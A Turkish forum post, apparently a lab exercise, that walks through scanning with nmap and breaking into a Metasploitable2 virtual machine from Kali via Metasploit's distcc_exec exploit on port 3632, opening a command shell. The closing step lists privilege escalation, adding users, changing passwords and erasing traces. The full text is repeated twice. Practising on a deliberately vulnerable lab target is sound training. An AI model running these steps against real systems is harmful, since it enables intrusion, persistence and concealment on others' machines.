Rıdvankaya
Uzman Üye
- Katılım
- 21 Eyl 2023
- Mesajlar
- 95
- Tepkime puanı
- 43
- Puanları
- 18
- Yaş
- 32
- Konum
- Midyat/Mardin
- Web sitesi
- github.com
Kali Sanal Makinesinden Metasploitable2 Sanal Makinesine Metasploit Aracıyla Sızma ve
Savunmasız DISTCC’den Yararlanma
Aşağıdaki işlem adımlarına göre Kali sanal makinesinden Metasploitable2 sanal makinesine metasploit aracıyla sızıp bu sanal makineden sistem bilgilerini alma, arka kapı oluşturma,
bağlantıyı sonlandırma eylemlerini gerçekleştiriniz.
1. Adım: Bilgisayara kurulan sanal makinedeki Kali’nin içinde nmap –sP 192.168.0.0 komutuyla bulunan ağdaki IP adreslerini ve ana bilgisayarları tespit ediniz.
2. Adım: Sanal makinedeki Kali Linux işletim sistemindeyken “ifconfig” komutunu yazınız ve bu makinenin IP adresini bulunuz.
3. Adım: Hedef bilgisayarın IP adresini keşfettikten sonra nmap aracıyla ağ taraması gerçekleştiriniz ve ağ haritası çıkarınız.
4. Adım: Hedef siteyle ilgili tam tarama işlemi de yapılabilir. İşlem sonucunda hedef bilgisayarda bulunan açık portları ve açıklık türünü listeleyiniz.
5. Adım: Bulunan zafiyetleri sömürmek amacıyla metasploit aracı kullanılmalıdır. Tespit edilen
zafiyetin adını metasploit aracı içinde aratınız.
6. Adım: Tarama sonucunda 3632 numaralı açık port için distcc_exec exploitini arayıp kullanınız.
7. Adım: “use” parametresiyle bulunan exploiti kullanım için seçiniz.
8. Adım: “show options” komutunu girerek bir önceki adımda belirlenen hedefin bilgilerini ekrana getiriniz.
9. Adım: “show payloads” komutunu terminale yazarak seçeneklerdeki payloadları görünüz.
10. Adım: Komut satırına set payload cmd/unix/interact yazarak kullanılacak payloadları belirleyiniz. Exploit ile hedef sisteme sızıldığında seçilen payload hedef sistemde çalışırsa kullanıcıya bir bağlantı oluşturur. Böylece hedef sistem payloadla kumanda edilir.
11. Adım: Komut satırına set rhost 192.168.1.37 ve set rport 3632 yazarak hedef sistemin IP ve açık port numarasını belirtiniz.
12. Adım: Komut satırına set lhost 192.168.1.36 yazarak kullanıcı bilgisayarının IP’sini giriniz.
13. Adım: Komut satırına “exploit” veya “run” yazarak işlemi sonlandırınız. Metasploitable2
sistemine sahip bilgisayara giriniz. İşlemin gerçekleştiğine dair ekranla karşılaşacaksınız.
14. Adım: command Shell session 1 opened ekranı geldiğinde “whoami” ve “uname” komutlarıyla hedef bilgisayarın bilgilerine bakınız. Bu işlemde hedef bilgisayarın TCP, UDP servisinde bir zafiyet kullanarak exploit işlemini gerçekleştiriniz.
15. Adım: Hedef bilgisayarda ilgili Linux komutlarıyla yetki yükseltme, dosya kopyalama,
istenilen dosyayı silme, kullanıcı ekleme, kullanıcı şifresini değiştirme, izleri silme, yapılan
değişiklikleri eski hâline getirme işlemlerini yapınız.
Savunmasız DISTCC’den Yararlanma
Aşağıdaki işlem adımlarına göre Kali sanal makinesinden Metasploitable2 sanal makinesine metasploit aracıyla sızıp bu sanal makineden sistem bilgilerini alma, arka kapı oluşturma,
bağlantıyı sonlandırma eylemlerini gerçekleştiriniz.
1. Adım: Bilgisayara kurulan sanal makinedeki Kali’nin içinde nmap –sP 192.168.0.0 komutuyla bulunan ağdaki IP adreslerini ve ana bilgisayarları tespit ediniz.
2. Adım: Sanal makinedeki Kali Linux işletim sistemindeyken “ifconfig” komutunu yazınız ve bu makinenin IP adresini bulunuz.
3. Adım: Hedef bilgisayarın IP adresini keşfettikten sonra nmap aracıyla ağ taraması gerçekleştiriniz ve ağ haritası çıkarınız.
4. Adım: Hedef siteyle ilgili tam tarama işlemi de yapılabilir. İşlem sonucunda hedef bilgisayarda bulunan açık portları ve açıklık türünü listeleyiniz.
5. Adım: Bulunan zafiyetleri sömürmek amacıyla metasploit aracı kullanılmalıdır. Tespit edilen
zafiyetin adını metasploit aracı içinde aratınız.
6. Adım: Tarama sonucunda 3632 numaralı açık port için distcc_exec exploitini arayıp kullanınız.
7. Adım: “use” parametresiyle bulunan exploiti kullanım için seçiniz.
8. Adım: “show options” komutunu girerek bir önceki adımda belirlenen hedefin bilgilerini ekrana getiriniz.
9. Adım: “show payloads” komutunu terminale yazarak seçeneklerdeki payloadları görünüz.
10. Adım: Komut satırına set payload cmd/unix/interact yazarak kullanılacak payloadları belirleyiniz. Exploit ile hedef sisteme sızıldığında seçilen payload hedef sistemde çalışırsa kullanıcıya bir bağlantı oluşturur. Böylece hedef sistem payloadla kumanda edilir.
11. Adım: Komut satırına set rhost 192.168.1.37 ve set rport 3632 yazarak hedef sistemin IP ve açık port numarasını belirtiniz.
12. Adım: Komut satırına set lhost 192.168.1.36 yazarak kullanıcı bilgisayarının IP’sini giriniz.
13. Adım: Komut satırına “exploit” veya “run” yazarak işlemi sonlandırınız. Metasploitable2
sistemine sahip bilgisayara giriniz. İşlemin gerçekleştiğine dair ekranla karşılaşacaksınız.
14. Adım: command Shell session 1 opened ekranı geldiğinde “whoami” ve “uname” komutlarıyla hedef bilgisayarın bilgilerine bakınız. Bu işlemde hedef bilgisayarın TCP, UDP servisinde bir zafiyet kullanarak exploit işlemini gerçekleştiriniz.
15. Adım: Hedef bilgisayarda ilgili Linux komutlarıyla yetki yükseltme, dosya kopyalama,
istenilen dosyayı silme, kullanıcı ekleme, kullanıcı şifresini değiştirme, izleri silme, yapılan
değişiklikleri eski hâline getirme işlemlerini yapınız.